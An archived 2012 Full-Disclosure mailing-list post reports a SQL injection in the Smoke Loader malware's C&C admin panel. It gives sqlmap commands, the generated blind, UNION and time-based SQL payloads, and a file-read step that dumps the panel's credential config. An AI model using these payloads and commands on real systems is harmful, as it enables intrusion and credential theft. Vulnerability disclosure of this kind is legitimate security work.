| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 20 Dec 2012 20:34:16 -0800
From: Ian <tohitsugu@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: smoke loader
Like other http-based exploit kits, I've discovered that the smoke loader malware downloader has a sql injection in its C&C administration panel that can be used to revel the administrator's password.
sqlmap can identify the vulnerable parameter with the string:
root@...alhoost:/opt/pentest/database/sqlmap# ./sqlmap.py -u evilserver.com/directory/guest.php
--auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3
--risk 3
sqlmap identified the following injection points with a total of 278
HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)
Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
RLIKE IF(2984=2984,0x4d7953514c,0x28)
Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a71616c3a,0x467173496b71686b617a,0x3a7269703a),NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 LIMIT 0,1 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a78746d3a,0x5164707853564955484a,0x3a6a67613a),NULL,NULL,NULL
AND SLEEP(5)
Then:
root@...alhoost:/opt/pentest/database/sqlmap# ./sqlmap.py -u evilserver.com/directory/guest.php
--auth-cred=guest:guest --auth-type=basic --dbms mysql --level 3 --risk
3 --file-read=[smoke root directory--can be found by sql errors on guest panel
by replacing the above parameters with invalid data]/admin/inc/cfg.php
root@...alhoost:/opt/pentest/database/sqlmap# cat output/localhost/files/_var_www_smoke_admin_inc_cfg.php
<?php
$config["admin"] = "bla"; //admin login name
$config["pass"] = "blabla"; //admin password
$config["guest"] = "guest"; //admin login name
$config["gpass"] = "guest"; //admin password
$config["dbhost"] = "localhost";
$config["dbname"] = "smoke"; //mysql database name
$config["dbuser"] = "bla"; //mysql database username
$config["dbpass"] = "meh"; //mysql databse password
$config["interval"] = 600; //interval for check online bots
$OS = array
(
0 => "Windows XP",
1 => "Windows 2003",
2 => "Windows Vista",
3 => "Windows 7",
4 => "Other"
);
?>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists